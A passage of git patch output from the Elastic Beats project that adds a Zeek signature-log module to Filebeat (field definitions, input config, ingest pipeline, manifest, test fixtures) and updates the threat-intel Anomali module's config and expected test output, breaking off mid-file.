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" } diff --git a/x-pack/filebeat/module/zeek/signature/_meta/fields.yml b/x-pack/filebeat/module/zeek/signature/_meta/fields.yml new file mode 100644 index 000000000000..7637ddd532bd --- /dev/null +++ b/x-pack/filebeat/module/zeek/signature/_meta/fields.yml @@ -0,0 +1,35 @@ +- name: signature + type: group + default_field: false + description: > + Fields exported by the Zeek Signature log. + fields: + - name: note + type: keyword + description: > + Notice associated with signature event. + + - name: sig_id + type: keyword + description: > + The name of the signature that matched. + + - name: event_msg + type: keyword + description: > + A more descriptive message of the signature-matching event. + + - name: sub_msg + type: keyword + description: > + Extracted payload data or extra message. + + - name: sig_count + type: integer + description: > + Number of sigs, usually from summary count. + + - name: host_count + type: integer + description: > + Number of hosts, from a summary count. diff --git a/x-pack/filebeat/module/zeek/signature/config/signature.yml b/x-pack/filebeat/module/zeek/signature/config/signature.yml new file mode 100644 index 000000000000..e6bef4d1a9da --- /dev/null +++ b/x-pack/filebeat/module/zeek/signature/config/signature.yml @@ -0,0 +1,50 @@ +type: log +paths: +{{ range $i, $path := .paths }} + - {{$path}} +{{ end }} +exclude_files: [".gz$"] +tags: {{.tags | tojson}} +publisher_pipeline.disable_host: {{ inList .tags "forwarded" }} + +processors: + - rename: + fields: + - {from: message, to: event.original} + - decode_json_fields: + fields: [event.original] + target: zeek.signature + - convert: + ignore_missing: true + fields: + - {from: zeek.signature.src_addr, to: source.address} + - {from: zeek.signature.src_addr, to: source.ip, type: ip} + - {from: zeek.signature.src_port, to: source.port, type: long} + - {from: zeek.signature.dst_addr, to: destination.address} + - {from: zeek.signature.dst_addr, to: destination.ip, type: ip} + - {from: zeek.signature.dst_port, to: destination.port, type: long} + - rename: + ignore_missing: true + fields: + - from: zeek.signature.uid + to: zeek.session_id + - from: zeek.signature.sig_id + to: rule.id + - from: zeek.signature.event_msg + to: rule.description + - drop_fields: + ignore_missing: true + fields: + - zeek.signature.src_addr + - zeek.signature.src_port + - zeek.signature.dst_addr + - zeek.signature.dst_port + - add_fields: + target: event + fields: + kind: alert + - community_id: + - add_fields: + target: '' + fields: + ecs.version: 1.7.0 diff --git a/x-pack/filebeat/module/zeek/signature/ingest/pipeline.yml b/x-pack/filebeat/module/zeek/signature/ingest/pipeline.yml new file mode 100644 index 000000000000..539ea5d79121 --- /dev/null +++ b/x-pack/filebeat/module/zeek/signature/ingest/pipeline.yml @@ -0,0 +1,89 @@ +--- +description: Pipeline for normalizing Zeek signature.log. +processors: + - set: + field: event.ingested + value: '{{_ingest.timestamp}}' + - set: + field: event.created + value: '{{@timestamp}}' + - date: + field: zeek.signature.ts + formats: + - UNIX + - remove: + field: zeek.signature.ts + # IP Geolocation Lookup + - geoip: + if: ctx.source?.geo == null + field: source.ip + target_field: source.geo + ignore_missing: true + properties: + - city_name + - continent_name + - country_iso_code + - country_name + - location + - region_iso_code + - region_name + - geoip: + if: ctx.destination?.geo == null + field: destination.ip + target_field: destination.geo + ignore_missing: true + properties: + - city_name + - continent_name + - country_iso_code + - country_name + - location + - region_iso_code + - region_name + + # IP Autonomous System (AS) Lookup + - geoip: + database_file: GeoLite2-ASN.mmdb + field: source.ip + target_field: source.as + properties: + - asn + - organization_name + ignore_missing: true + - geoip: + database_file: GeoLite2-ASN.mmdb + field: destination.ip + target_field: destination.as + properties: + - asn + - organization_name + ignore_missing: true + - rename: + field: source.as.asn + target_field: source.as.number + ignore_missing: true + - rename: + field: source.as.organization_name + target_field: source.as.organization.name + ignore_missing: true + - rename: + field: destination.as.asn + target_field: destination.as.number + ignore_missing: true + - rename: + field: destination.as.organization_name + target_field: destination.as.organization.name + ignore_missing: true + - append: + field: "related.ip" + value: "{{source.ip}}" + if: "ctx?.source?.ip != null" + - append: + field: "related.ip" + value: "{{destination.ip}}" + if: "ctx?.destination?.ip != null" + +on_failure: + - set: + field: error.message + value: "{{ _ingest.on_failure_message }}" diff --git a/x-pack/filebeat/module/zeek/signature/manifest.yml b/x-pack/filebeat/module/zeek/signature/manifest.yml new file mode 100644 index 000000000000..e0d005622d0a --- /dev/null +++ b/x-pack/filebeat/module/zeek/signature/manifest.yml @@ -0,0 +1,19 @@ +module_version: 1.0 + +var: + - name: paths + default: + - /var/log/bro/current/signatures.log + os.linux: + - /var/log/bro/current/signatures.log + os.darwin: + - /usr/local/var/logs/current/signatures.log + - name: tags + default: [zeek.signature] + +ingest_pipeline: ingest/pipeline.yml +input: config/signature.yml + +requires.processors: +- name: geoip + plugin: ingest-geoip diff --git a/x-pack/filebeat/module/zeek/signature/test/signature-json.log b/x-pack/filebeat/module/zeek/signature/test/signature-json.log new file mode 100644 index 000000000000..4725117d90e6 --- /dev/null +++ b/x-pack/filebeat/module/zeek/signature/test/signature-json.log @@ -0,0 +1 @@ +{"ts": 1611852809.869245,"uid": "CbjAXE4CBxJ8W7VoJg","src_addr": "124.51.137.154","src_port": 51617,"dst_addr": "160.218.27.63","dst_port": 445,"note": "Signatures::Sensitive_Signature","sig_id": "my-second-sig","event_msg": "124.51.137.154: TCP traffic","sub_msg": ""} diff --git a/x-pack/filebeat/module/zeek/signature/test/signature-json.log-expected.json b/x-pack/filebeat/module/zeek/signature/test/signature-json.log-expected.json new file mode 100644 index 000000000000..d06eb256245b --- /dev/null +++ b/x-pack/filebeat/module/zeek/signature/test/signature-json.log-expected.json @@ -0,0 +1,48 @@ +[ + { + "@timestamp": "2021-01-28T16:53:29.869Z", + "destination.address": "160.218.27.63", + "destination.as.number": 5610, + "destination.as.organization.name": "O2 Czech Republic, a.s.", + "destination.geo.continent_name": "Europe", + "destination.geo.country_iso_code": "CZ", + "destination.geo.country_name": "Czechia", + "destination.geo.location.lat": 50.0848, + "destination.geo.location.lon": 14.4112, + "destination.ip": "160.218.27.63", + "destination.port": 445, + "event.dataset": "zeek.signature", + "event.kind": "alert", + "event.module": "zeek", + "event.original": "{\"ts\": 1611852809.869245,\"uid\": \"CbjAXE4CBxJ8W7VoJg\",\"src_addr\": \"124.51.137.154\",\"src_port\": 51617,\"dst_addr\": \"160.218.27.63\",\"dst_port\": 445,\"note\": \"Signatures::Sensitive_Signature\",\"sig_id\": \"my-second-sig\",\"event_msg\": \"124.51.137.154: TCP traffic\",\"sub_msg\": \"\"}", + "fileset.name": "signature", + "input.type": "log", + "log.offset": 0, + "related.ip": [ + "124.51.137.154", + "160.218.27.63" + ], + "rule.description": "124.51.137.154: TCP traffic", + "rule.id": "my-second-sig", + "service.type": "zeek", + "source.address": "124.51.137.154", + "source.as.number": 17858, + "source.as.organization.name": "LG POWERCOMM", + "source.geo.city_name": "Busan", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "KR", + "source.geo.country_name": "South Korea", + "source.geo.location.lat": 35.1003, + "source.geo.location.lon": 129.0442, + "source.geo.region_iso_code": "KR-26", + "source.geo.region_name": "Busan", + "source.ip": "124.51.137.154", + "source.port": 51617, + "tags": [ + "zeek.signature" + ], + "zeek.session_id": "CbjAXE4CBxJ8W7VoJg", + "zeek.signature.note": "Signatures::Sensitive_Signature", + "zeek.signature.sub_msg": "" + } +] \ No newline at end of file diff --git a/x-pack/filebeat/modules.d/zeek.yml.disabled b/x-pack/filebeat/modules.d/zeek.yml.disabled index 5e0854908952..feacbf939d6a 100644 --- a/x-pack/filebeat/modules.d/zeek.yml.disabled +++ b/x-pack/filebeat/modules.d/zeek.yml.disabled @@ -23,7 +23,7 @@ http: enabled: true intel: - enabled: true + enabled: true irc: enabled: true kerberos: @@ -46,6 +46,8 @@ enabled: true rfb: enabled: true + signature: + enabled: true sip: enabled: true smb_cmd: From f9fe84d6875cc4fcbf58536033734cbde04d631b Mon Sep 17 00:00:00 2001 From: Marius Iversen Date: Wed, 17 Feb 2021 01:12:55 +0100 Subject: [PATCH 61/63] updating manifest files for filebeat threatintel module (#24074) * updating manifest files for filebeat threatintel module * split on new object type in config --- .../threatintel/anomali/config/config.yml | 7 +- .../module/threatintel/anomali/manifest.yml | 4 +- .../anomali_limo.ndjson.log-expected.json | 200 +++++++++--------- .../module/threatintel/misp/config/config.yml | 2 + .../module/threatintel/otx/config/config.yml | 4 + .../module/threatintel/otx/manifest.yml | 2 + 6 files changed, 116 insertions(+), 103 deletions(-) diff --git a/x-pack/filebeat/module/threatintel/anomali/config/config.yml b/x-pack/filebeat/module/threatintel/anomali/config/config.yml index f266fe17ff96..19e58b4bc12d 100644 --- a/x-pack/filebeat/module/threatintel/anomali/config/config.yml +++ b/x-pack/filebeat/module/threatintel/anomali/config/config.yml @@ -4,9 +4,12 @@ type: httpjson config_version: "2" interval: {{ .interval }} +{{ if .username }} auth.basic.user: {{ .username }} +{{ end }} +{{ if .password }} auth.basic.password: {{ .password }} - +{{ end }} request.method: GET {{ if .ssl }} - request.ssl: {{ .ssl | tojson }} @@ -32,7 +35,7 @@ request.transforms: default: '[[ formatDate (now (parseDuration "-{{ .first_interval }}")) "2006-01-02T15:04:05.999Z" ]]' response.split: - target: body.results + target: body.objects cursor: timestamp: diff --git a/x-pack/filebeat/module/threatintel/anomali/manifest.yml b/x-pack/filebeat/module/threatintel/anomali/manifest.yml index 83836cfdd19b..b7b87d8fe66d 100644 --- a/x-pack/filebeat/module/threatintel/anomali/manifest.yml +++ b/x-pack/filebeat/module/threatintel/anomali/manifest.yml @@ -5,6 +5,8 @@ var: default: httpjson - name: interval default: 60m + - name: first_interval + default: 24h - name: ssl - name: types default: indicators @@ -13,7 +15,7 @@ var: - name: url default: "https://otx.alienvault.com/api/v1/indicators/export" - name: tags - default: [threatintel-otx, forwarded] + default: [threatintel-anomali, forwarded] ingest_pipeline: - ingest/pipeline.yml diff --git a/x-pack/filebeat/module/threatintel/anomali/test/anomali_limo.ndjson.log-expected.json b/x-pack/filebeat/module/threatintel/anomali/test/anomali_limo.ndjson.log-expected.json index b6d6f76e1ee7..69205da6d594 100644 --- a/x-pack/filebeat/module/threatintel/anomali/test/anomali_limo.ndjson.log-expected.json +++ b/x-pack/filebeat/module/threatintel/anomali/test/anomali_limo.ndjson.log-expected.json @@ -10,7 +10,7 @@ "log.offset": 0, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332361; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", @@ -45,7 +45,7 @@ "log.offset": 609, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332307; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", @@ -80,7 +80,7 @@ "log.offset": 1255, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332302; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", @@ -114,7 +114,7 @@ "log.offset": 1867, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332312; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime", @@ -148,7 +148,7 @@ "log.offset": 2441, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332386; iType: mal_url; State: active; Source: CyberCrime", @@ -183,7 +183,7 @@ "log.offset": 3015, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332391; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", @@ -218,7 +218,7 @@ "log.offset": 3598, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332372; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime", @@ -249,7 +249,7 @@ "log.offset": 4149, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332313; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", @@ -284,7 +284,7 @@ "log.offset": 4747, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332350; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", @@ -319,7 +319,7 @@ "log.offset": 5356, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332291; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", @@ -353,7 +353,7 @@ "log.offset": 5971, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332343; iType: mal_ip; State: active; Source: CyberCrime", @@ -384,7 +384,7 @@ "log.offset": 6501, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332316; iType: mal_url; State: active; Org: Sksa Technology Sdn Bhd; Source: CyberCrime", @@ -419,7 +419,7 @@ "log.offset": 7147, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332284; iType: mal_url; State: active; Org: Oltelecom Jsc; Source: CyberCrime", @@ -453,7 +453,7 @@ "log.offset": 7711, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332337; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime", @@ -484,7 +484,7 @@ "log.offset": 8259, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332324; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime", @@ -515,7 +515,7 @@ "log.offset": 8812, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332296; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", @@ -549,7 +549,7 @@ "log.offset": 9427, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332400; iType: mal_url; State: active; Source: CyberCrime", @@ -584,7 +584,7 @@ "log.offset": 9997, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332396; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", @@ -619,7 +619,7 @@ "log.offset": 10580, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332363; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", @@ -654,7 +654,7 @@ "log.offset": 11189, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332320; iType: mal_url; State: active; Source: CyberCrime", @@ -689,7 +689,7 @@ "log.offset": 11769, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332367; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", @@ -724,7 +724,7 @@ "log.offset": 12378, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332317; iType: mal_url; State: active; Org: SoftLayer Technologies; Source: CyberCrime", @@ -759,7 +759,7 @@ "log.offset": 12985, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332309; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", @@ -794,7 +794,7 @@ "log.offset": 13633, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332286; iType: mal_url; State: active; Org: Garanntor-Hosting; Source: CyberCrime", @@ -829,7 +829,7 @@ "log.offset": 14255, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332339; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", @@ -864,7 +864,7 @@ "log.offset": 14830, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332319; iType: mal_ip; State: active; Org: SoftLayer Technologies; Source: CyberCrime", @@ -895,7 +895,7 @@ "log.offset": 15387, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332305; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", @@ -929,7 +929,7 @@ "log.offset": 15942, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332346; iType: mal_url; State: active; Org: Ifx Networks Colombia; Source: CyberCrime", @@ -964,7 +964,7 @@ "log.offset": 16606, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332323; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime", @@ -999,7 +999,7 @@ "log.offset": 17261, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332399; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", @@ -1034,7 +1034,7 @@ "log.offset": 17841, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332328; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime", @@ -1065,7 +1065,7 @@ "log.offset": 18385, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332377; iType: mal_url; State: active; Org: A100 ROW GmbH; Source: CyberCrime", @@ -1100,7 +1100,7 @@ "log.offset": 18973, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332101; iType: mal_ip; State: active; Source: CyberCrime", @@ -1131,7 +1131,7 @@ "log.offset": 19501, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332357; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", @@ -1166,7 +1166,7 @@ "log.offset": 20107, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332289; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", @@ -1200,7 +1200,7 @@ "log.offset": 20722, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332334; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime", @@ -1235,7 +1235,7 @@ "log.offset": 21304, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332326; iType: mal_url; State: active; Org: RUCloud; Source: CyberCrime", @@ -1270,7 +1270,7 @@ "log.offset": 21882, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332311; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", @@ -1305,7 +1305,7 @@ "log.offset": 22491, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332341; iType: mal_url; State: active; Org: Institute of Philosophy, Russian Academy of Scienc; Source: CyberCrime", @@ -1339,7 +1339,7 @@ "log.offset": 23094, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332303; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", @@ -1373,7 +1373,7 @@ "log.offset": 23709, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", "forwarded" ], "threatintel.anomali.description": "TS ID: 55241332380; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", @@ -1408,7 +1408,7 @@ "log.offset": 24318, "service.type": "threatintel", "tags": [ - "threatintel-otx", + "threatintel-anomali", 